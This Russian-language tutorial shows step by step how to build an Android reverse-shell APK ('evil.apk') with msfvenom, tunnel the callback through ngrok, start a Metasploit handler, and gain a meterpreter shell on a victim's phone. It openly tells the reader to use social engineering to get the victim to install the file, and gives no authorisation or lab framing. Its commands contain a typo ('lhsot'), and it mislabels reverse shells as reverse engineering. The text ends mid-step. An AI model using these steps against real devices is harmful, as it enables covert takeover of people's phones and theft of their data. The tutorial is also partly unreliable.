Как использовать обратную оболочку в Metasploit в Kali Linux

Опубликовано: 16 Января, 2023

Metasploitis не просто один инструмент. Это полная структура. Это модульная платформа для тестирования на проникновение на основе Ruby, которая позволяет вам писать, тестировать и выполнять код эксплойта, она гибкая и чрезвычайно надежная и имеет множество инструментов для выполнения различных простых и сложных задач. Metasploit Framework создает полезную нагрузку в формате apk, exe и т. д., которую можно выполнить, и как только скрипт запускается, он обеспечивает подключение к системе или телефону жертвы. Платформа Metasploit встроена в большинство операционных систем с ядром Linux, и мы также можем использовать ее в Windows,

Мы можем скачать Metasploit Framework по ссылке ниже:

https://www.metasploit.com/download

В этой статье мы получим обратный доступ к телефону Android с помощью полезной нагрузки.

Что такое обратная оболочка?

Обратная оболочка или оболочка с обратным подключением — это способ захвата системы жертвы из-за ее уязвимостей, дающих доступ к сеансу оболочки системы жертвы. В большинстве случаев обратная оболочка успешна, потому что здесь жертва пускает вас только в свою систему. Конечно, брандмауэр запрещает внешнее соединение, но большинство брандмауэров разрешают любое исходящее соединение. Хакеры используют жертв для проникновения в свою систему, жертва сама позволяет нам подключиться через себя, это называется Reverse Engineering.

Создание обратного сценария оболочки Android с использованием Metasploit-framework

В большинстве систем на базе Linux Metasploit уже установлен, и мы также можем использовать его в Windows, но процесс отличается, в Windows у нас будет GUI (графический интерфейс пользователя), но в Linux у вас будет правильный CLI (Интерфейс командной строки) опыт.

Давайте установим его на наши Linux-системы:

Шаг 1: Установка Metasploit

Запустите терминал и установите его с помощью

sudo apt install metasploit-framework

или же мы можем также клонировать репозиторий Rapid7 на GitHub

git clone https://github.com/rapid7/metasploit-framework

После успешной установки мы можем попробовать запустить консоль Metasploit, просто написав:

msfconsole

Примечание. Если у вас возникли проблемы с установкой, попробуйте клонировать его с GitHub.

Вам будет предложено мигающим курсором с надписью msf6>. Ну, выйдите из этого на данный момент. Для выхода введите

exit

Теперь нам нужно сделать сценарий обратной оболочки для устройства Android, и наилучшим подходящим форматом будет файл .apk.

Шаг 2. Использование службы туннелирования Ngrok

Ngrok — это служба туннелирования, которая позволяет нам подключаться через серверы или системы через глобальную сеть. Он дает доступ к удаленным системам, даже не касаясь их сетей. Это безопасный и надежный сервис туннелирования.

Создайте идентификатор и загрузите файл, после загрузки файла откройте терминал и следуйте инструкциям.

cd <path to ngrok>
unzip ngrok.zip

После этого мы увидим разархивированный файл ngrok, теперь мы дали ему токен доступа, который мы получили с вашей панели управления ngrok.

Примечание . Перейдите на сайт, где вы загрузили службу ngrok, вы увидите там свой токен авторизации с помощью команды, скопируйте его.

ngrok config add-authtoken <your token>

Мы увидим, если ничего не произойдет, но токен будет сохранен в вашей системе. теперь попробуйте запустить службу ngrok, чтобы проверить процесс

./ngrok tcp 8080

Здесь мы использовали протокол TCP , поэтому мы должны указать его с номером порта.

Note: Port number can be of your choice 4-digit number.

Шаг 3: Создание полезной нагрузки

Теперь пусть он будет открыт и запустите новый терминал. Мы должны создать полезную нагрузку/скрипт для обратной оболочки. В новом терминале введите следующую команду:

msfvenom -p android/meterpreter/reverse_tcp lhsot=0.tcp.in.ngrok.io lport=<the port address just beside> R> evil.apk

  • msfvenom: команда платформы Metasploit, используемая для создания скриптов.
  • -p: указание типа полезной нагрузки
  • android/meterpreter/reverse_tcp: встроенный скрипт Metasploit, используемый для подключения обратной оболочки Android.
  • lhost: для определения хоста.
  • lport: для определения адреса порта.
  • R>: Чтобы определить имя и местоположение вашей полезной нагрузки.

Теперь все, что вам нужно сделать, это выполнить социальную инженерию и отправить файл apk жертве. Теперь мы должны быть готовы принять соединение, поэтому давайте подготовим для него сессию. Очистите терминал и начните

msfconsole

Это откроет консоль Metasploit, где мы будем принимать соединение.

В настоящее время,

msf6> use exploit/multi/handler
msf6> set payload android/meterpreter/reverse_tcp
msf6> set LHOST 127.0.0.1
msf6> set LPORT 8080
msf6> exploit -j

если жертва установила apk и запустила его в первый раз, вам будет предложено пройти сеанс meterpreter или обратную оболочку.

После приглашения к сеансу meterpreter введите

help

Мы увидим кучу команд, которые вы можете выполнить с системой жертвы. Давайте попробуем получить сеанс оболочки, просто введите shell

meterpreter> shell

Мы увидим это: